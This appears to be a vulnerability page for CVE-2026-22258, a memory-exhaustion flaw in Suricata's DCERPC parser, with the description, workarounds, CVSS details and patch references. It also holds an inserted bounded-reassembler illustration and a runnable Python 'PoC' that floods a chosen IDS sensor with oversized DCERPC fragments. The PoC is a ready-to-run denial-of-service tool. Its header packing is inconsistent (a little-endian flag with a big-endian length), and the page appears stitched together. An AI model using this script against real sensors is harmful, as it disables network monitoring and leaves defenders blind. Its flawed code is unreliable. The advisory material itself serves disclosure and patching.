Security Vulnerability Report
CVE-2026-22258 CVSS 7.5 HIGH

CVE-2026-22258

Published: 2026-01-27 17:16:12
Last Modified: 2026-01-30 20:09:24

Description

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer without limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over UDP, it is believed that DCERPC over TCP and SMB are also vulnerable. DCERPC/TCP in the default configuration should not be vulnerable as the default stream depth is limited to 1 MiB. Versions 8.0.3 and 7.0.14 contain a patch. Some workarounds are available. For DCERPC/UDP, disable the parser. For DCERPC/TCP, the `stream.reassembly.depth` setting will limit the amount of data that can be buffered. For DCERPC/SMB, the `stream.reassembly.depth` can be used as well, but is set to unlimited by default. Imposing a limit here may lead to loss of visibility in SMB.
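As an added defensive illustration (not the page's PoC, nor code from Suricata or the advisory), the following bounded DCERPC fragment reassembler shows the CWE-770 pattern behind this CVE: stub data accumulated across the fragments of one call must be capped, much as `stream.reassembly.depth` caps buffered TCP data. The header layout follows the DCERPC common header (RPC version 5, pfc_flags, drep byte order); `make_pdu`, the cap values and the byte samples are constructed for illustration, and `max_bytes=None` reproduces the unbounded growth the description refers to.

```python
import struct

PFC_FIRST_FRAG = 0x01  # pfc_flags bit: first fragment of a call
PFC_LAST_FRAG = 0x02   # pfc_flags bit: last fragment of a call
HDR_LEN = 16           # size of the DCERPC common header


def parse_header(pdu):
    """Parse the 16-byte DCERPC common header -> (ptype, flags, frag_len, call_id)."""
    if len(pdu) < HDR_LEN:
        raise ValueError("PDU shorter than the common header")
    if pdu[0] != 5:
        raise ValueError("not an RPC version 5 PDU")
    ptype, flags = pdu[2], pdu[3]
    little = bool(pdu[4] & 0x10)  # drep[0] bit 4 selects little-endian integers
    frag_len, _auth_len, call_id = struct.unpack("<HHI" if little else ">HHI", pdu[8:16])
    if frag_len < HDR_LEN or frag_len > len(pdu):
        raise ValueError("frag_length inconsistent with PDU size")
    return ptype, flags, frag_len, call_id


def make_pdu(flags, body, call_id=1):
    """Build a constructed request PDU (ptype 0, little-endian drep) for tests."""
    hdr = bytes([5, 0, 0, flags, 0x10, 0, 0, 0])
    return hdr + struct.pack("<HHI", HDR_LEN + len(body), 0, call_id) + body


class BoundedReassembler:
    """Per-call_id fragment reassembly; max_bytes=None is the unbounded (CWE-770) behaviour."""

    def __init__(self, max_bytes=None):
        self.max_bytes = max_bytes
        self.pending = {}  # call_id -> bytearray of stub data seen so far

    def feed(self, pdu):
        """Return the reassembled body on the last fragment, else None."""
        _ptype, flags, frag_len, call_id = parse_header(pdu)
        body = pdu[HDR_LEN:frag_len]
        if flags & PFC_FIRST_FRAG:
            self.pending[call_id] = bytearray()
        buf = self.pending.get(call_id)
        if buf is None:
            raise ValueError("continuation fragment with no first fragment")
        if self.max_bytes is not None and len(buf) + len(body) > self.max_bytes:
            del self.pending[call_id]  # drop state instead of growing without limit
            raise MemoryError("reassembly depth exceeded for call %d" % call_id)
        buf += body
        if flags & PFC_LAST_FRAG:
            return bytes(self.pending.pop(call_id))
        return None
```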

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Exploitability Score: 3.9
Impact Score: 3.6

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata < 7.0.14)
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata >= 8.0.0, < 8.0.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22258 PoC - Suricata DCERPC Memory Exhaustion

This PoC demonstrates sending crafted DCERPC traffic to trigger memory exhaustion.

Note: For authorized security testing only.
"""
import socket
import struct
import random
import sys
import time


def create_dcerpc_fragment(is_last_frag=True, data_size=4000):
    """Create a DCERPC fragment with oversized data"""
    # DCERPC Fragment header (16 bytes)
    version = b'\x05'
    packet_type = b'\x00'  # Bind or Alter context
    packet_flags = b'\x03' if is_last_frag else b'\x01'
    # Data representation
    endian = b'\x10'  # Little-endian
    # Fragment length (including header)
    frag_length = 16 + data_size
    # Auth length (no auth)
    auth_length = b'\x00\x00'
    # Call ID
    call_id = struct.pack('<I', 1)
    # Fragment header
    header = version + packet_type + packet_flags + endian
    header += struct.pack('>H', frag_length)  # Big-endian for length
    header += auth_length + call_id
    # Payload - oversized data to exhaust memory
    payload = header + (b'\x41' * data_size)
    return payload


def exploit_cve_2026_22258(target_ip, target_port=135, protocol='udp', duration=60):
    """
    Send crafted DCERPC packets to exhaust Suricata memory

    Args:
        target_ip: Target Suricata sensor IP
        target_port: DCERPC port (135 for SMB, 49152+ for dynamic)
        protocol: 'udp' or 'tcp'
        duration: Attack duration in seconds
    """
    print(f"[*] Starting CVE-2026-22258 exploit against {target_ip}:{target_port}")
    print(f"[*] Protocol: {protocol.upper()}")
    if protocol.lower() == 'udp':
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    else:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))
    start_time = time.time()
    packet_count = 0
    try:
        while time.time() - start_time < duration:
            # Create oversized DCERPC fragments
            payload = create_dcerpc_fragment(is_last_frag=False, data_size=65535)
            try:
                sock.send(payload)
                packet_count += 1
                if packet_count % 100 == 0:
                    print(f"[*] Sent {packet_count} packets...")
            except Exception as e:
                print(f"[!] Send error: {e}")
                break
            time.sleep(0.01)  # Small delay
    finally:
        sock.close()
    elapsed = time.time() - start_time
    print(f"[*] Attack completed. Sent {packet_count} packets in {elapsed:.2f}s")


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python3 cve_2026_22258_poc.py <target_ip> [port] [protocol]")
        print("Example: python3 cve_2026_22258_poc.py 192.168.1.100 135 udp")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 135
    proto = sys.argv[3] if len(sys.argv) > 3 else 'udp'
    exploit_cve_2026_22258(target, port, proto)

References

https://github.com/OISF/suricata/commit/39d8c302af3422a096b75474a4f295a754ec6a74 (Patch)
https://github.com/OISF/suricata/commit/f82a388d0283725cb76782cf64e8341cab370830 (Patch)
https://github.com/OISF/suricata/security/advisories/GHSA-289c-h599-3xcx (Patch, Vendor Advisory)
https://redmine.openinfosecfoundation.org/issues/8182 (Issue Tracking, Permissions Required)

Weaknesses

CWE-400 (Uncontrolled Resource Consumption)
CWE-770 (Allocation of Resources Without Limits or Throttling)